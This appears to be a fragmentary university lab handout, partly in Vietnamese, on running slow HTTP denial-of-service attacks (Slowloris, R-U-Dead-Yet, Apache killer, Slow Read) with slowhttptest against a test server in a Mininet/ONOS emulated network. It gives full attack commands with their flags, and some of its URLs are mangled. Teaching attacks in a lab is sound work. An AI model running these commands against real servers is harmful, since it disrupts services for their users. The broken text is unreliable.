LabSDN ONOS Mininet
LabSDN ONOS Mininet
1) Mã SV, Họ và tên
3)
MỤC LỤC
1. ONOS with Mininet...........................................................................................1
2. Excercise.............................................................................................................2
3. References...........................................................................................................2
>> Yêu cầu chụp hình ảnh là kết quả thực hành của SV. Không sử dụng lại hình ảnh của
bài lab.
As you may notice this attacks are all based on application level using HTTP to attack
a server. This tutorial will focus on running and understanding the attacks, but not on the
implementation of the attacks. We will use a denial of service attack simulator
called slowhttptest it is a CLI that already has implemented this attacks so we can run
them with ease.
To verify if the installation was successful run:
user@vmsdn:~$ slowhttptest -h
R-U-Dead-Yet or Rudy: -B
Apache killer: -R
Slow Read: -X
Above command this will run a simple topology with 5 hosts, 1 switch and it will
connect to the ONOS controller with the ONOS_IP. You can get the ONOS
controller ip from the ONOS UI.
mininet> xterm h1
Above command this will open an emulated terminal for the host 1, which will be
our http server.
On the h1 terminal run coomd to setup a simple http server on the host 1 that will
listen on the port 80.
root@vmsdm:~# python -m SimpleHTTPServer 80
- 0%[ ] 0 --.-KB/s
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"><html>
<title>Directory listing for /</title>
<body>
<h2>Directory listing for /</h2>
<hr>
<ul>
<li><a href=".bash_history">.bash_history</a>
<li><a href=".bash_logout">.bash_logout</a>
<li><a href=".bashrc">.bashrc</a>
...
...
<li><a href="Videos/">Videos/</a>
</ul>
<hr>
</body>
</html>
- 100%[===================>] 2.58K --.-KB/s in 0s
mininet>
After running the attack we can try a request to host 1 http server by running the
following command on the mininet terminal
mininet> h2 wget -O - h1
To run the other attacks you just add the respective flags that were explained on
the Install slowhttptest section. Below is the list with the full commands.
Slowloris (default):
R-U-Dead-Yet or Rudy:
root@vmsdm:~# slowhttptest -B -u http://10.0.0.1
Apache killer:
root@vmsdm:~# slowhttptest -R -u http://10.0.0.1
Slow Read:
root@vmsdm:~# slowhttptest -X -u http://10.0.0.1
4. References
[2]. .